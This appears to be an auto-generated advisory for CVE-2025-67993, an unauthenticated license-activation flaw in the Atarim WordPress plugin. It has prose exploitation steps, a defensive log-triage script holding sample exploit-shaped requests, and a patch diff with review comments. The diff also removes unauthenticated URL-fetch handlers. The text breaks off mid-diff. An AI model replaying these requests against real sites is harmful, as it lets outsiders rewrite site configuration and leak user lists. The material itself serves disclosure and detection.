Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-67993: Atarim <= 4.2.1 – Missing Authorization (atarim-visual-collaboration)

Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 4.2.1
Patched Version 4.2.2
Disclosed February 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67993:
The Atarim WordPress plugin (atarim-visual-collaboration), version 4.2.1 and earlier, contains a missing authorization vulnerability in its license activation callback handler. Because the handler runs on every request and performs no authentication, capability or nonce check, an unauthenticated attacker can trigger the administrative actions it carries out: writing the plugin's license and site-identity options, tagging the current user as an Atarim "advisor", and kicking off the initial user synchronisation with the Atarim service.

Atomic Edge research identifies the root cause in the `new_license_activation()` function in the main plugin file `atarim-visual-collaboration.php`. The function is attached to the WordPress `init` hook, so it runs on every page load, front end and admin alike (the relevant hunk in the diff below starts at line 443 of the 4.2.1 file). The vulnerable code performs no `is_user_logged_in()`, `current_user_can()` or nonce check before processing the `atarim_response` GET parameter. It writes several WordPress options with `update_option()`, modifies user metadata with `update_user_meta()`, fires the `wpf_initial_sync` action and calls `syncUsers()`, all without verifying that the request comes from an authenticated administrator.

Exploitation is a single crafted HTTP GET request to any URL on the WordPress site that carries the `atarim_response` parameter; `init` fires before routing, so no particular endpoint is needed and a request to the site root is enough. The attacker supplies base64-encoded values for `atarim_response` and, optionally, `license_key`, `expires`, `prod_id`, `payment_id` and `checksum`; `wpf_site_id` is read unconditionally, so it should be supplied as well. The handler base64-decodes each value and stores it in the corresponding `wpf_*` option, passing the license key through `wpf_crypt_key()` first. No session, CSRF token or nonce is required. One quirk matters when reproducing: the `%3D` branch compares against the already URL-decoded `$_GET` value, so it only fires on a double-encoded parameter (`%253D`), and when it does fire `substr( ..., -1, 3 )` keeps only the final character; send `atarim_response` single-encoded and the value is stored as-is.

The patch in version 4.2.2 adds authorization checks before any option is written. The updated `new_license_activation()` returns immediately when `atarim_response` is absent and otherwise requires `is_admin()`, `is_user_logged_in()`, `current_user_can( 'manage_options' )` and a `page` parameter. `page` is base64-decoded in strict mode and split with `parse_str()`; it must yield the slug `collaboration_page_settings` and an `atarim_state` value that passes `wp_verify_nonce()` for the action `wpf_new_license_activation`. The nonce is not a separate query parameter: it is embedded in the base64 `page_redirect` value generated when the activation link is built on the settings page and the initial-setup page. WordPress nonces are bound to the logged-in user's session, so the callback must return to the same administrator's browser that generated the link. Any request that fails a check is sent to the home page with `wp_safe_redirect( home_url() )` and the handler exits.

Successful exploitation gives the attacker control over the plugin's license state and configuration: `wpf_license`, `wpf_license_key`, `wpf_license_expires`, `wpf_prod_id`, `wpf_decr_key`, `wpf_decr_checksum` and `wpf_site_id` are all set from request input, and `wpf_initial_setup_complete` is forced to `yes`. The `update_user_meta( $user_id, 'wpf_user_type', 'advisor' )` call sets a plugin-level user type, not a WordPress role, and for an unauthenticated request `$current_user->ID` resolves to no real account (0 or unset); it does affect a real account when a logged-in low-privilege user is lured to the crafted URL. The handler then fires `wpf_initial_sync` and calls `syncUsers()` with the attacker-chosen license and site id, which may push the site's user list to an Atarim account the attacker controls. The attacker can also break license validation or disrupt the plugin simply by overwriting these options. The CVSS 5.3 score is consistent with an unauthenticated, network-reachable attack whose confirmed impact is limited to site integrity.
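The triage script below is an added example written for this page; it is not Atomic Edge's tooling or Atarim's code. It takes the request shape from the exploitation paragraph above and the two structural rules the 4.2.2 handler enforces (the request must be under `/wp-admin/`, and `page` must strict-base64-decode to `collaboration_page_settings&atarim_state=...`) and applies them to web-server access-log lines, so a responder can separate frontend hits that 4.2.1 would have processed from callbacks shaped like the legitimate admin flow. Python is used rather than PHP because this runs against logs, not inside WordPress. The log lines, addresses and parameter values are constructed for the example; the parameter and `wpf_*` option names come from the diff below. The script cannot check the nonce itself (that needs the site's secrets and the admin's session), so a "callback-shaped" hit is not proof of legitimacy, only of the right shape.

```python
"""Triage access-log lines for CVE-2025-67993 activation-callback requests.

Added example, not Atomic Edge's or Atarim's code. All sample traffic is constructed.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlsplit

# Parameters the handler base64-decodes into wp_options (names from the diff).
LICENSE_PARAMS = ("license_key", "expires", "prod_id", "payment_id", "checksum", "wpf_site_id")
EXPECTED_PAGE_SLUG = "collaboration_page_settings"   # slug the patched handler locks to

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def _b64q(value: str) -> str:
    """base64 then percent-encode, the way the activation link carries values."""
    return quote(base64.b64encode(value.encode()).decode(), safe="")


# Constructed traffic: a frontend hit shaped like the pre-patch exploit, an ordinary
# page view, a callback shaped like the patched flow, and an admin hit with the wrong slug.
SAMPLE_LOG = "\n".join([
    f'203.0.113.7 - - [08/Feb/2026:10:12:01 +0000] "GET /?atarim_response={_b64q("1")}'
    f'&license_key={_b64q("ABC-123")}&wpf_site_id={_b64q("999")}'
    f'&expires={_b64q("2029-01-01")} HTTP/1.1" 302 0 "-" "curl/8.4.0"',
    '203.0.113.7 - - [08/Feb/2026:10:12:05 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.4 - - [08/Feb/2026:11:30:44 +0000] "GET /wp-admin/admin.php?page='
    f'{_b64q(EXPECTED_PAGE_SLUG + "&atarim_state=abcd1234")}&atarim_response={_b64q("1")}'
    f'&license_key={_b64q("ABC-123")}&wpf_site_id={_b64q("999")} HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    f'203.0.113.7 - - [08/Feb/2026:12:00:00 +0000] "GET /wp-admin/admin.php?page={_b64q("not-the-page")}'
    f'&atarim_response={_b64q("1")} HTTP/1.1" 302 0 "-" "curl/8.4.0"',
])


def decode_b64(value: str):
    """Strict decode, mirroring base64_decode($x, true); None on malformed input."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def classify(target: str):
    """Return (verdict, details) for one request target, or None if it is not a callback."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if "atarim_response" not in query:
        return None
    in_admin = parts.path.startswith("/wp-admin/")
    page_fields = {}
    if "page" in query:
        decoded_page = decode_b64(query["page"][0])
        if decoded_page is not None:
            # parse_str('page=' . $decoded) splits the slug from the state token
            page_fields = parse_qs("page=" + decoded_page, keep_blank_values=True)
    slug_ok = page_fields.get("page", [""])[0] == EXPECTED_PAGE_SLUG
    has_state = bool(page_fields.get("atarim_state", [""])[0])
    # "callback-shaped" still needs an admin session and a valid nonce under 4.2.2;
    # "pre-patch-only" is what <= 4.2.1 accepted from anyone, on any URL.
    verdict = "callback-shaped" if (in_admin and slug_ok and has_state) else "pre-patch-only"
    details = {
        "in_admin": in_admin,
        "slug_ok": slug_ok,
        "has_state": has_state,
        # what the handler would have written into wp_options
        "decoded": {k: decode_b64(query[k][0]) for k in LICENSE_PARAMS if k in query},
    }
    return verdict, details


def triage(log_text: str):
    """Collect every logged request that would reach new_license_activation()."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify(m["target"])
        if result is None:
            continue
        verdict, details = result
        hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                     "verdict": verdict, **details})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["verdict"], hit["decoded"])
```

Run it as a script to print the constructed hits, or import `triage()` and feed it a real access log. The decoded values are what the handler would have written into `wp_options`; on a suspected site, compare them with the current `wpf_site_id` and `wpf_license_*` values and check `wp_usermeta` for unexpected `wpf_user_type = advisor` rows.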

Differential between vulnerable and patched code

Code Diff
--- a/atarim-visual-collaboration/atarim-visual-collaboration.php
+++ b/atarim-visual-collaboration/atarim-visual-collaboration.php
@@ -2,7 +2,7 @@
 /*
  * Plugin Name: Atarim: Visual Website Collaboration, Feedback & Workflow Management
  * Description: Atarim Visual Collaboration makes it easy and efficient to collaborate on websites with your clients, internal team, contractors…anyone! It’s used by nearly 10,000 agencies and freelancers worldwide on over 120,000 websites.
- * Version: 4.2.1
+ * Version: 4.2.2
  * Requires at least: 5.0
  * Require PHP: 7.4
  * Author: Atarim
@@ -29,7 +29,7 @@
     define( 'WPF_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
 }
 if ( ! defined( 'WPF_VERSION' ) ) {
-    define( 'WPF_VERSION', '4.2.1' );
+    define( 'WPF_VERSION', '4.2.2' );
 }

 define( 'SCOPER_ALL_UPLOADS_EDITABLE ', true );
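Review bot: unrelated to the version bump but visible in this hunk's context, `define( 'SCOPER_ALL_UPLOADS_EDITABLE ', true );` has a trailing space inside the constant name, so `SCOPER_ALL_UPLOADS_EDITABLE` is never actually defined and any `defined()` check for it elsewhere is false. Worth fixing while this file is being touched.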
@@ -85,107 +85,94 @@
         return;
     }

-    // Decode what wp.org sent.
+    // 1) Get raw string from wp.org and normalise.
     $raw = html_entity_decode(
         $response->upgrade_notice,
         ENT_QUOTES,
         get_bloginfo( 'charset' )
     );

-    // Normalise newlines.
-    $raw = str_replace( array( "rn", "r" ), "n", $raw );
+    // If wp.org wrapped it in <p> / <br>, flatten to text first.
+    // Replace <br> with spaces, strip remaining tags.
+    $raw = preg_replace( '#<brs*/?>#i', ' ', $raw );
+    $raw = wp_strip_all_tags( $raw, true );

-    // If wp.org wrapped it in <p>, flatten that to plain text with newlines.
-    if ( strpos( $raw, '<p' ) !== false ) {
-        $raw = preg_replace( '#</p>s*<p>#i', "nn", $raw ); // paragraph break → blank line
-        $raw = preg_replace( '#</?p[^>]*>#i', '', $raw );      // remove remaining <p> tags
-    }
+    // Collapse multiple whitespace to single spaces.
+    $raw = trim( preg_replace( "/s+/", " ", $raw ) );

-    $raw = trim( $raw );
     if ( $raw === '' ) {
         return;
     }

-    // Find blocks of the form: **Title:** body ... (until next ** or end)
-    // Each match gives you one "notice box".
-    $pattern = '/**(.+?)**(.*?)(?=n**|z)/s';
-    if ( ! preg_match_all( $pattern, $raw, $matches, PREG_SET_ORDER ) ) {
-        // Fallback: no ** sections, treat whole thing as one block.
-        $matches = array(
-            array( 0, '', $raw ),
-        );
+    $title      = '';
+    $body       = '';
+    $line_break = false;
+
+    // RULE 1: Exclamation "Title!" → bold + line break.
+    $posBang = strpos( $raw, '!' );
+    if ( $posBang !== false ) {
+        $title      = trim( substr( $raw, 0, $posBang + 1 ) ); // include !
+        $body       = trim( substr( $raw, $posBang + 1 ) );
+        $line_break = true;
+    } else {
+        // RULE 2: Hyphen "Title - body" → bold, no line break.
+        $posDash = strpos( $raw, '-' );
+        if ( $posDash !== false ) {
+            $title      = trim( substr( $raw, 0, $posDash ) );
+            $body       = trim( substr( $raw, $posDash + 1 ) );
+            $line_break = false;
+        } else {
+            // RULE 3: No markers → no title, whole thing is body.
+            $body = $raw;
+        }
     }

-    foreach ( $matches as $match ) {
-
-        $title = isset( $match[1] ) ? trim( $match[1] ) : '';
-        $body  = isset( $match[2] ) ? trim( $match[2] ) : '';
+    // 2) Build HTML safely.

-        // Strip trailing colon from title if present.
-        $title = trim( $title, " tnrx0B:" );
-
-        // Convert markdown-style links in title/body if present: [text](url)
-        if ( strpos( $title . $body, '[' ) !== false && strpos( $title . $body, '](' ) !== false ) {
-            $replace_links = function( $text ) {
-                return preg_replace(
-                    '/[(.+?)]((https?://[^s)]+))/',
-                    '<a href="$2" target="_blank" rel="noopener noreferrer">$1</a>',
-                    $text
-                );
-            };
-            $title = $replace_links( $title );
-            $body  = $replace_links( $body );
-        }
-
-        // Convert any remaining newlines in body to <br>.
-        if ( $body !== '' ) {
-            $body = nl2br( $body );
-        }
-
-        // Box styling: full-width-ish, default WP-ish yellow.
-        // Using <span> (phrasing content) with display:block so we stay valid inside core's <p>.
-        $style  = 'display:block;';
-        $style .= 'margin-top:8px;';
-        $style .= 'padding:10px 14px;';
-        $style .= 'background:#fff8e5;';
-        $style .= 'border-left:4px solid #d63638;';
-        $style .= 'border-radius:4px;';
-        $style .= 'line-height:1.5;';
-        $style .= 'box-sizing:border-box;';
-
-        echo '<span class="atarim-upgrade-notice" style="' . esc_attr( $style ) . '">';
-
-        if ( $title !== '' ) {
-            // Allow links inside the title, nothing else fancy.
-            echo '<strong>' . wp_kses(
-                    $title,
-                    array(
-                        'a' => array(
-                            'href'   => array(),
-                            'target' => array(),
-                            'rel'    => array(),
-                        ),
-                    )
-                ) . ':</strong>';
-        }
-
-        if ( $body !== '' ) {
-            echo '<br />';
-            echo wp_kses(
-                $body,
-                array(
-                    'br' => array(),
-                    'a'  => array(
-                        'href'   => array(),
-                        'target' => array(),
-                        'rel'    => array(),
-                    ),
-                )
-            );
-        }
+    // Auto-link bare URLs in body (https://...).
+    $body_html = esc_html( $body );
+    if ( $body_html !== '' ) {
+        $body_html = preg_replace(
+            '~(https?://[^s<]+)~',
+            '<a href="$1" target="_blank" rel="noopener noreferrer">$1</a>',
+            $body_html
+        );
+    }

-        echo '</span>';
+    // Box styling (full-width WP-style).
+    $style  = 'display:block;';
+    $style .= 'margin-top:8px;';
+    $style .= 'padding:10px 14px;';
+    $style .= 'background:#fff8e5;';
+    $style .= 'border-left:4px solid #d63638;';
+    $style .= 'border-radius:4px;';
+    $style .= 'line-height:1.5;';
+    $style .= 'box-sizing:border-box;';
+
+    echo '<span class="atarim-upgrade-notice" style="' . esc_attr( $style ) . '">';
+
+    // Title part
+    if ( $title !== '' ) {
+        echo '<strong>' . esc_html( $title ) . '</strong>';
+        echo $line_break ? '<br />' : ' ';
+    }
+
+    // Body part
+    if ( $body_html !== '' ) {
+        // Limit allowed tags to <a> only (we created those).
+        echo wp_kses(
+            $body_html,
+            array(
+                'a' => array(
+                    'href'   => array(),
+                    'target' => array(),
+                    'rel'    => array(),
+                ),
+            )
+        );
     }
+
+    echo '</span>';
 }

 /*
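Review bot: the new title split fires on the first `!` or `-` anywhere in the notice, including inside a URL or a hyphenated word in the body, which cuts a link in half before the auto-linker runs; only honour a marker that appears before the first `http`, or only at the start of the notice. Two smaller points. As rendered here the pattern literals (`'#<brs*/?>#i'`, `"/s+/"`) lack the backslash escapes needed to match `<br>` and whitespace, so confirm the shipped file reads `\s` and not `s`. And `$body_html = esc_html( $body )` followed by the `preg_replace` that wraps `$1` in `href="$1"` is only safe because `esc_html` has already encoded `"` and `&` in the URL; keep that ordering if this block is ever reorganised.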
@@ -443,47 +430,89 @@
 add_action( 'init', 'session_for_invited_user' );

 function new_license_activation() {
-
-    /*New license activation*/
-    if ( isset( $_GET['atarim_response'] ) ) {
-        global $current_user;
-        $user_id = $current_user->ID;
-
-        // remove the %3D(it's 7 if decoded) from the query string parameter if present
-        if ( strpos( $_GET['atarim_response'], '%3D' ) !== false ) {
-            $atarim_response = substr( $_GET['atarim_response'], -1, 3 );
-        } else {
-            $atarim_response = $_GET['atarim_response'];
-        }
-        update_option( 'wpf_license', base64_decode( sanitize_text_field( $atarim_response ) ) );
-        $wpf_license_key = '';
-        if ( isset( $_GET['license_key'] ) ) {
-            $wpf_license_key = base64_decode( sanitize_text_field( $_GET['license_key'] ) );
-            $wpf_crypt_key = wpf_crypt_key( $wpf_license_key, 'e' );
-            update_option( 'wpf_license_key', $wpf_crypt_key, 'no' );
-        }
-        if ( isset( $_GET['expires'] ) ) {
-            update_option( 'wpf_license_expires', base64_decode( sanitize_text_field( $_GET['expires'] ) ), 'no' );
-        }
-        if ( isset( $_GET['prod_id'] ) ) {
-            update_option( 'wpf_prod_id', base64_decode( sanitize_text_field( $_GET['prod_id'] ) ), 'no' );
-        }
-        if ( isset( $_GET['payment_id'] ) ) {
-            $decr = update_option( 'wpf_decr_key', base64_decode( sanitize_text_field( $_GET['payment_id'] ) ) );
-        }
-        if ( isset( $_GET['checksum'] ) ) {
-            $checksu = update_option( 'wpf_decr_checksum', base64_decode( sanitize_text_field( $_GET['checksum'] ) ), 'no' );
-        }
-        update_option( 'wpf_site_id', base64_decode( sanitize_text_field( $_GET['wpf_site_id'] ) ), 'no' );
-        update_user_meta( $user_id, 'wpf_user_type', 'advisor' );
-        do_action( 'wpf_initial_sync', $wpf_license_key );
-        syncUsers();
-        update_option("wpf_initial_setup_complete", 'yes');
-
-        // redirect user to front side after activation process is complete by Pratap on 21/09/2023.
-        wp_safe_redirect( WPF_HOME_URL );
-        exit();
+    if (! isset( $_GET['atarim_response'])) {
+        return;
     }
+
+    if (
+        ! is_admin() ||
+        ! is_user_logged_in() ||
+        ! current_user_can( 'manage_options' ) ||
+        ! isset( $_GET['page'] )
+    ) {
+        wp_safe_redirect( home_url() );
+        exit;
+    }
+
+    $page_raw = sanitize_text_field( wp_unslash( $_GET['page'] ) );
+    $page_decoded = base64_decode( $page_raw, true );
+
+    if ( false === $page_decoded ) {
+        wp_safe_redirect( home_url() );
+        exit;
+    }
+
+    $parsed = [];
+    parse_str( 'page=' . $page_decoded, $parsed );
+
+    $page_slug    = isset( $parsed['page'] ) ? $parsed['page'] : '';
+    $atarim_state = isset( $parsed['atarim_state'] ) ? $parsed['atarim_state'] : '';
+
+    // Optionally lock to the expected page slug.
+    if ( 'collaboration_page_settings' !== $page_slug ) {
+        wp_safe_redirect( home_url() ); // or WPF_HOME_URL if you prefer
+        exit;
+    }
+
+    // Verify nonce / state.
+    if ( empty( $atarim_state ) || ! wp_verify_nonce( $atarim_state, 'wpf_new_license_activation' ) ) {
+        wp_safe_redirect( home_url() ); // or WPF_HOME_URL if you prefer
+        exit;
+    }
+
+    global $current_user;
+    $user_id = $current_user->ID;
+
+    // remove the %3D(it's 7 if decoded) from the query string parameter if present
+    if ( strpos( $_GET['atarim_response'], '%3D' ) !== false ) {
+        $atarim_response = substr( $_GET['atarim_response'], -1, 3 );
+    } else {
+        $atarim_response = $_GET['atarim_response'];
+    }
+
+    update_option( 'wpf_license', base64_decode( sanitize_text_field( $atarim_response ) ) );
+    $wpf_license_key = '';
+    if ( isset( $_GET['license_key'] ) ) {
+        $wpf_license_key = base64_decode( sanitize_text_field( $_GET['license_key'] ) );
+        $wpf_crypt_key = wpf_crypt_key( $wpf_license_key, 'e' );
+        update_option( 'wpf_license_key', $wpf_crypt_key, 'no' );
+    }
+
+    if ( isset( $_GET['expires'] ) ) {
+        update_option( 'wpf_license_expires', base64_decode( sanitize_text_field( $_GET['expires'] ) ), 'no' );
+    }
+
+    if ( isset( $_GET['prod_id'] ) ) {
+        update_option( 'wpf_prod_id', base64_decode( sanitize_text_field( $_GET['prod_id'] ) ), 'no' );
+    }
+
+    if ( isset( $_GET['payment_id'] ) ) {
+        $decr = update_option( 'wpf_decr_key', base64_decode( sanitize_text_field( $_GET['payment_id'] ) ) );
+    }
+
+    if ( isset( $_GET['checksum'] ) ) {
+        $checksu = update_option( 'wpf_decr_checksum', base64_decode( sanitize_text_field( $_GET['checksum'] ) ), 'no' );
+    }
+
+    update_option( 'wpf_site_id', base64_decode( sanitize_text_field( $_GET['wpf_site_id'] ) ), 'no' );
+    update_user_meta( $user_id, 'wpf_user_type', 'advisor' );
+    do_action( 'wpf_initial_sync', $wpf_license_key );
+    syncUsers();
+    update_option("wpf_initial_setup_complete", 'yes');
+
+    // redirect user to front side after activation process is complete by Pratap on 21/09/2023.
+    wp_safe_redirect( WPF_HOME_URL );
+    exit();
 }
 add_action( 'init', 'new_license_activation' );
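Review bot: two carry-overs survive the new gate. `update_option( 'wpf_site_id', base64_decode( sanitize_text_field( $_GET['wpf_site_id'] ) ), 'no' );` still reads `$_GET['wpf_site_id']` without `isset()`, so a callback that omits it raises a notice and overwrites the stored site id with an empty string; guard it like the other parameters. And the `%3D` branch is either dead or wrong: PHP has already URL-decoded `$_GET`, so `%3D` only appears on double-encoded input, and `substr( $_GET['atarim_response'], -1, 3 )` returns just the final character, which is then base64-decoded and stored as `wpf_license`. Drop the branch, or trim padding from the decoded value instead. The authorization order itself is right: `is_admin()`, the login check, `manage_options`, strict `base64_decode`, the slug match and `wp_verify_nonce` all run before the first `update_option()`. Because the nonce is bound to the administrator's session, the callback must land in the same browser that generated the activation link; that is the intended flow but worth stating in the commit message.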

--- a/atarim-visual-collaboration/inc/admin/page-settings-permissions.php
+++ b/atarim-visual-collaboration/inc/admin/page-settings-permissions.php
@@ -82,7 +82,12 @@
                                         echo '<div class="wpf_license_deactivate_wrap"><p><span class="wpf_active_license" style="color:#0aaf3a;">' . __( 'License Active', 'atarim-visual-collaboration' ) . '</span></p>';
                                         echo '<input type="submit" class="wpf_deactivate_button" name="wpf_license_deactivate" value="'.__( "Deactivate License", 'atarim-visual-collaboration' ).'"/></div>';
                                     } else {
-                                        $home_url = WPF_APP_SITE_URL . '?activation_callback='.Base64_encode( WPF_SITE_URL ).'&page_redirect=' . Base64_encode( "collaboration_page_settings" ) . '&site_url=' . Base64_encode( WPF_HOME_URL );
+                                        $atarim_state = wp_create_nonce( 'wpf_new_license_activation' );
+                                        $page_redirect = base64_encode('collaboration_page_settings&atarim_state=' . $atarim_state);
+                                        $home_url = WPF_APP_SITE_URL
+                                            . '?activation_callback=' . base64_encode( WPF_SITE_URL )
+                                            . '&page_redirect=' . $page_redirect
+                                            . '&site_url=' . base64_encode( WPF_HOME_URL );
                                         echo '<a href="'.$home_url.'"><button type="button" class="wpf_activate_btn" name="wpf_activate" access="false" id="ber_page4_save"><span class="dashicons dashicons-update"></span>' . __( 'Activate This Website', 'atarim-visual-collaboration' ) . '</button></a>';
                                     }
                                     ?>
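Review bot: `$home_url` is echoed into `href` unescaped; wrap it with `esc_url( $home_url )` now that the URL carries a nonce. Also, `atarim_state` travels inside the base64 `page_redirect` blob to `WPF_APP_SITE_URL`, and the callback handler strict-decodes `$_GET['page']`, so this depends on the Atarim app returning `page_redirect` verbatim as `page`; any re-encoding or padding change on the app side will send every legitimate activation to the home page with no error shown.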
--- a/atarim-visual-collaboration/inc/admin/wpf_backend_initial_setup.php
+++ b/atarim-visual-collaboration/inc/admin/wpf_backend_initial_setup.php
@@ -27,8 +27,13 @@
 						?>
 					</p>
 					<input type="hidden" name="action" value="save_wpfeedback_options"/>
-					<?php
-						$google_sup = WPF_APP_SITE_URL . '/google-auth?activation_callback='.Base64_encode( WPF_SITE_URL ).'&page_redirect=' . Base64_encode( "collaboration_page_settings" ) . '&site_url=' . Base64_encode( WPF_HOME_URL );
+					<?php
+                        $atarim_state = wp_create_nonce( 'wpf_new_license_activation' );
+                        $page_redirect = base64_encode('collaboration_page_settings&atarim_state=' . $atarim_state);
+                        $google_sup = WPF_APP_SITE_URL
+                            . '/google-auth?activation_callback=' . base64_encode( WPF_SITE_URL )
+                            . '&page_redirect=' . $page_redirect
+                            . '&site_url=' . base64_encode( WPF_HOME_URL );
 					?>
 					<a href="<?php echo $google_sup; ?>" class="supg-btn">
 						<span>
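Review bot: this is the second copy of the nonce-and-link construction (the settings page has the same lines) and a third follows below; factor it into one helper such as `wpf_activation_redirect_url( $path )` so the action string `wpf_new_license_activation` is defined once and cannot drift from the verifier in `new_license_activation()`. The `echo $google_sup;` inside `<a href>` should also go through `esc_url()`.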
@@ -64,7 +69,12 @@
 						printf( __( '<p class="wpf_tcpp">By opening an account I agree to the <a href="https://atarim.io/privacy-policy/" target="_blank">privacy policy</a>.</p>', 'atarim-visual-collaboration' ) );
 					?>
 					<?php
-						$home_url = WPF_APP_SITE_URL . '?activation_callback=' . Base64_encode( WPF_SITE_URL ) . '&page_redirect=' . Base64_encode( "collaboration_page_settings" ) . '&site_url=' . Base64_encode( WPF_HOME_URL );
+                        $atarim_state = wp_create_nonce( 'wpf_new_license_activation' );
+                        $page_redirect = base64_encode('collaboration_page_settings&atarim_state=' . $atarim_state);
+                        $home_url = WPF_APP_SITE_URL
+                            . '?activation_callback=' . base64_encode( WPF_SITE_URL )
+                            . '&page_redirect=' . $page_redirect
+                            . '&site_url=' . base64_encode( WPF_HOME_URL );
 						echo '<p class="wpf_has_account" style="width:100%"><a class="wpf_account_link" href="' . $home_url . '">I already have an account (Login)</a></p>';
 					?>
 					<!--End new activation-->
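Review bot: same duplicated link construction as above, and `$home_url` echoed into `href` should use `esc_url()`. Unrelated but in context: `printf( __( '<p class="wpf_tcpp">...' ) )` passes the translated string as a format string with no arguments, so a `%` in a translation breaks output; `echo` is the right call there.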
--- a/atarim-visual-collaboration/inc/wpf_ajax_functions.php
+++ b/atarim-visual-collaboration/inc/wpf_ajax_functions.php
@@ -354,7 +354,6 @@
                         }

                         $name           = "<div class='wpf_initials'>" . $author . "</div>";
-                        $image_dwn_icon = "<span id='wpf_push_media' class='wpf_push_media wpf_image_download'>" . get_wpf_push_to_media_icon() . "</span><span id='wpf_image_open' class='wpf_image_open' onclick='wpf_image_open_new_tab(this)'>" . get_wpf_image_open_icon();
                         if ( strpos( $comment['comment_content'], 'wpfeedback-image.s3' ) !== false ) {
                             if ( $comment['comment_type'] == 'image/png' || $comment['comment_type'] == 'image/gif' || $comment['comment_type'] == 'image/jpeg' ) {
                                 $comment_text = '<a href="' . $comment['comment_content'] . '" target=_blank><div class="tag_img" style="width: 275px;height: 183px;"><div class="meassage_area_main"><a href="' . $comment['comment_content'] . '" target="_blank"></a><img src="' . $comment['comment_content'] . '" alt="" style="width: 100%;" class="wpfb_task_screenshot">' . $image_dwn_icon . '</div></div></a>';
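Review bot: the `$image_dwn_icon` assignment is removed, but the `$comment_text` line in this hunk still concatenates `' . $image_dwn_icon . '` inside the screenshot markup, so every image comment now triggers an undefined-variable notice (a warning on PHP 8) and the rendered HTML depends on whatever that emits. Remove the reference or assign an empty string.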
@@ -2065,65 +2064,6 @@
 }

 /*
- * This function is used to push the media to the wordpress media library. It is called from Atarim dashboard.
- * URL: DOMAIN/wp-admin/admin-ajax.php?action=app_push_to_media
- *
- * @input string
- * @return String
- */
-if ( ! function_exists( 'app_push_to_media' ) ) {
-    function app_push_to_media() {
-        $valid = wpf_api_request_verification();
-        if( $valid == 1 ) {
-            $input_json = file_get_contents( 'php://input' );
-            $input      = json_decode( $input_json );
-            require_once( ABSPATH . 'wp-admin/includes/media.php' );
-            require_once( ABSPATH . 'wp-admin/includes/file.php' );
-            require_once( ABSPATH . 'wp-admin/includes/image.php' );
-            $save_url   = $input->url;
-            $res        = media_sideload_image( $save_url );
-
-            if ( ! is_wp_error( $res ) ) {
-                $response = 200;
-            } else {
-                $response = 400;
-            }
-        } else {
-            $response = 403;
-        }
-		echo $response;
-		exit;
-    }
-}
-add_action( 'wp_ajax_push_app_push_to_media', 'app_push_to_media' );
-add_action( 'wp_ajax_nopriv_app_push_to_media', 'app_push_to_media' );
-
-/*
- * This function is used to push the media to the wordpress media library. It is called from task popover.
- *
- * @input string
- * @return numeric
- */
-if ( ! function_exists( 'push_to_media' ) ) {
-    function push_to_media() {
-        wpf_security_check();
-        $save_url = sanitize_url( $_POST['media_link'] );
-        require_once( ABSPATH . 'wp-admin/includes/media.php' );
-        require_once( ABSPATH . 'wp-admin/includes/file.php' );
-        require_once( ABSPATH . 'wp-admin/includes/image.php' );
-        $res = media_sideload_image( $save_url );
-        if ( ! is_wp_error( $res ) ) {
-            echo 1;
-        } else {
-            echo 2;
-        }
-        exit;
-    }
-}
-add_action( 'wp_ajax_push_to_media', 'push_to_media' );
-add_action( 'wp_ajax_nopriv_push_to_media', 'push_to_media' );
-
-/*
  * This function is get the milestone of the site
  *
  * @input Array ( $_POST )
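Review bot: removing both handlers rather than hardening them is the right call. `push_to_media` was registered on `wp_ajax_nopriv_push_to_media` and handed `$_POST['media_link']` straight to `media_sideload_image()`, so anyone could make the server fetch an arbitrary URL into the media library, and `app_push_to_media` did the same from `$input->url` behind `wpf_api_request_verification()`. Make sure the front-end JavaScript that posted `action=push_to_media` and the dashboard caller of `app_push_to_media` are removed too; otherwise they now receive admin-ajax's bare `0` response.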
--- a/atarim-visual-collaboration/inc/wpf_api.php
+++ b/atarim-visual-collaboration/inc/wpf_api.php
@@ -161,30 +161,6 @@
 add_action( 'wp_ajax_nopriv_wpf_website_details', 'wpf_website_details' );

 /*
- * This function is called by the APP to get the users of the website.
- * URL: DOMAIN/wp-admin/admin-ajax.php?action=wpf_website_users
- *
- * @input NULL
- * @return JSON
- */
-function wpf_website_users() {
-    $valid = wpf_api_request_verification();
-    if ( $valid == 1 ) {
-        $response = wpf_api_func_get_users();
-        // fixed sync of users when user click the "sync" button on the app
-        get_notif_sitedata_filterdata();
-        $response_signature = wpf_generate_response_signature( $response );
-        header( "response-signature: " . $response_signature );
-    } else {
-        $response = 'invalid request';
-    }
-    echo $response;
-    exit;
-}
-add_action( 'wp_ajax_wpf_website_users', 'wpf_website_users' );
-add_action( 'wp_ajax_nopriv_wpf_website_users', 'wpf_website_users' );
-
-/*
  * This function is called from APP when website is requested to resync. This function is also called from the website when the button "Resync the Central Dashboard" button is clicked.
  * URL: DOMAIN/wp-admin/admin-ajax.php?action=wpf_website_resync
  *
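Review bot: `wpf_website_users` is dropped, but `wpf_website_details` on the context line above keeps its `wp_ajax_nopriv_` registration with the same `wpf_api_request_verification()` gate the removed function relied on. If that gate was judged insufficient for listing users, the commit message should say what it verifies (signature over the request, shared secret) so reviewers can judge whether the remaining nopriv endpoints in this file are adequately protected.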
@@ -530,11 +506,32 @@
     return $data;
 }

+function wpf_visual_composer_api_permissions( WP_REST_Request $request ) {
+    // Require a logged-in user with admin capabilities.
+    if ( ! is_user_logged_in() ) {
+        return new WP_Error(
+            'rest_forbidden',
+            __( 'Authentication required.', 'atarim-visual-collaboration' ),
+            array( 'status' => rest_authorization_required_code() )
+        );
+    }
+
+    if ( ! current_user_can( 'edit_posts' ) ) {
+        return new WP_Error(
+            'rest_forbidden',
